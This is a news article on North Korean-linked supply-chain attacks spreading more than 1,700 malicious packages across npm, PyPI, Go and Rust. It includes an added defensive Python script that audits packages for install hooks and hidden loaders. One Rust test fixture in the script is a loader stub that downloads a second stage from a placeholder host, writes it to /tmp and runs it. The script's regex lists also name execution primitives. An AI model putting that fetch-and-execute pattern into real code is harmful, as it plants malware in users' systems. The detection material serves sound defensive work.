North Korean Hackers Unleash 1,700 Malicious Packages Across Major Code Repositories

North Korean-linked threat actors have significantly expanded their cyber operations, distributing over 1,700 malicious packages across popular software repositories including npm, PyPI, Go, and Rust. The campaign, dubbed "Contagious Interview," aims to infiltrate developer environments through sophisticated supply chain attacks, posing a substantial risk to software integrity and user data.

Key Takeaways

  • Over 1,700 malicious packages identified across npm, PyPI, Go, Rust, and Packagist.

  • Packages impersonate legitimate developer tools to act as malware loaders.

  • Malware capabilities include infostealing, remote access, and extensive post-compromise actions.

  • The campaign is attributed to financially motivated North Korean actors, overlapping with groups like UNC1069 and BlueNoroff.

A Coordinated Cross-Ecosystem Attack

The "Contagious Interview" campaign has evolved its tactics by targeting multiple open-source ecosystems. Malicious packages were designed to mimic legitimate developer tools, such as logging and debugging utilities, making them less likely to arouse suspicion. These packages function as malware loaders, designed to fetch and execute second-stage payloads.

Sophisticated Malware and Post-Compromise Functionality

The payloads delivered by these malicious packages possess infostealer and Remote Access Trojan (RAT) capabilities. They primarily focus on exfiltrating sensitive data from web browsers, password managers, and cryptocurrency wallets. Notably, a Windows version of the malware, delivered via the "license-utils-kit" package, includes a comprehensive post-compromise implant. This implant can execute shell commands, log keystrokes, steal browser data, upload files, terminate browsers, deploy AnyDesk for remote access, create encrypted archives, and download additional modules.

Stealthy Infection Methods

A key aspect of this campaign's sophistication lies in how the malicious code is triggered. Instead of activating during installation, the malware is embedded within seemingly legitimate functions that align with the package's advertised purpose. For instance, in the "logtrace" Rust package, the malicious code is hidden within a method named "Logger::trace(i32)," making it extremely difficult for developers to detect during routine use or debugging.
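The two previous sections describe a loader pattern (a package that fetches and runs a second stage) and the evasion that makes it hard to spot (the loader lives inside an ordinary-looking method rather than an install hook). The following is an added example, not code from the article or from any of the cited sources, of a small heuristic audit a defender can run over a package before adopting it. It checks two things: install-time hooks in the manifest, and functions whose body both reaches the network and executes or writes something. The package sources and manifests below are constructed fixtures written to resemble the article's description; the crate name, method body, hostname and file paths are placeholders, not the real "logtrace" package.

```python
"""Heuristic loader check for third-party packages (added example, not vendor code).

Check 1: lifecycle hooks that run at install time (npm scripts, Cargo build script).
Check 2: any single function that both reaches the network AND executes/persists
         something. Check 1 alone misses the pattern described in the article,
         where the loader is hidden inside a normal-looking method.
"""
import re

# Regexes for "reaches the network" and "executes/persists", per language.
NET = {
    "rust": [r"\breqwest::", r"\bureq::", r"\bTcpStream::connect", r"\bhyper::"],
    "js": [r"\brequire\(['\"]https?['\"]\)", r"\bfetch\(", r"\baxios\b"],
    "python": [r"\burllib\.request\b", r"\brequests\.(get|post)\b", r"\bsocket\.create_connection\b"],
}
EXEC = {
    "rust": [r"\bprocess::Command::new", r"\bCommand::new\(", r"\bstd::fs::write\("],
    "js": [r"\bchild_process\b", r"\bexec(Sync)?\(", r"\bspawn\(", r"\beval\(", r"new Function\("],
    "python": [r"\bsubprocess\.", r"\bexec\(", r"\beval\(", r"\bos\.system\("],
}


def split_functions(src: str, lang: str) -> dict:
    """Crude function splitter: finds fn/function/def headers and returns each body
    (brace-matched for Rust/JS, up to the next def for Python). Heuristic, not a parser."""
    header = {
        "rust": r"\bfn\s+([A-Za-z_][A-Za-z0-9_]*)\s*[<(]",
        "js": r"\bfunction\s+([A-Za-z_$][\w$]*)\s*\(",
        "python": r"^\s*def\s+([A-Za-z_]\w*)\s*\(",
    }[lang]
    out = {}
    matches = list(re.finditer(header, src, re.M))
    for i, m in enumerate(matches):
        if lang == "python":
            end = matches[i + 1].start() if i + 1 < len(matches) else len(src)
            out[m.group(1)] = src[m.start():end]
            continue
        start = src.find("{", m.end())  # opening brace of the body
        if start < 0:
            continue
        depth = 0
        for j in range(start, len(src)):
            if src[j] == "{":
                depth += 1
            elif src[j] == "}":
                depth -= 1
                if depth == 0:
                    out[m.group(1)] = src[m.start():j + 1]
                    break
    return out


def manifest_hooks(manifest: dict, ecosystem: str) -> list:
    """Check 1: install-time hooks. Takes the parsed package.json or Cargo.toml."""
    if ecosystem == "npm":
        scripts = manifest.get("scripts", {})
        return [k for k in scripts if k in ("preinstall", "install", "postinstall", "prepare")]
    if ecosystem == "cargo":
        return ["build.rs"] if manifest.get("package", {}).get("build") else []
    return []


def loader_functions(src: str, lang: str) -> list:
    """Check 2: names of functions that both fetch over the network and execute/persist."""
    flagged = []
    for name, body in split_functions(src, lang).items():
        hits_net = any(re.search(p, body) for p in NET[lang])
        hits_exec = any(re.search(p, body) for p in EXEC[lang])
        if hits_net and hits_exec:
            flagged.append(name)
    return flagged


def audit(manifest: dict, ecosystem: str, src: str, lang: str) -> dict:
    """Run both checks and report; an empty install_hooks list is not a clean bill."""
    return {"install_hooks": manifest_hooks(manifest, ecosystem),
            "loader_functions": loader_functions(src, lang)}


# Constructed fixture resembling the article's description: no build script, and the
# loader sits inside a method whose name matches the crate's advertised purpose.
SAMPLE_CARGO = {"package": {"name": "logtrace-lookalike", "version": "0.1.0"}}
SAMPLE_RUST = r'''
pub struct Logger;
impl Logger {
    pub fn info(&self, msg: &str) { println!("[info] {}", msg); }
    pub fn trace(&self, level: i32) {
        println!("[trace] level {}", level);
        // constructed stub for the example: fetch a blob, write it, run it
        let body = reqwest::blocking::get("https://PLACEHOLDER.invalid/stage2").unwrap().bytes().unwrap();
        std::fs::write("/tmp/.cache", &body).unwrap();
        std::process::Command::new("/tmp/.cache").spawn().unwrap();
    }
}
'''
# Constructed npm fixture that the hook check alone does catch.
SAMPLE_PKG_JSON = {"name": "debug-helper-lookalike", "version": "1.0.0",
                   "scripts": {"postinstall": "node setup.js"}}

if __name__ == "__main__":
    print("rust crate:", audit(SAMPLE_CARGO, "cargo", SAMPLE_RUST, "rust"))
    print("npm package:", audit(SAMPLE_PKG_JSON, "npm", "", "js"))
```

The Rust fixture produces no install hook at all, so a policy that only inspects build scripts and npm lifecycle hooks would pass it; only the per-function check flags `trace`. The regex lists are deliberately short and will both miss obfuscated loaders and flag legitimate updaters, so treat a hit as a prompt for manual review of that function, not as a verdict.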

Broader North Korean Cyber Operations

This discovery is part of a larger pattern of software supply chain compromises attributed to North Korean hacking groups. These operations often involve poisoning popular packages or compromising maintainer accounts through social engineering. The financially motivated threat actor UNC1069, which overlaps with groups like BlueNoroff, Sapphire Sleet, and Stardust Chollima, is believed to be behind this activity. Security firms have reported blocking numerous UNC1069-linked domains impersonating services like Microsoft Teams and Zoom, often using multi-week social engineering campaigns to deliver malware.

Sources

  • N. Korean Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust, The Hacker News.

  • North Korea: 1,700 malicious Npm, PyPI, Go, Rust packages, SecNews.gr.
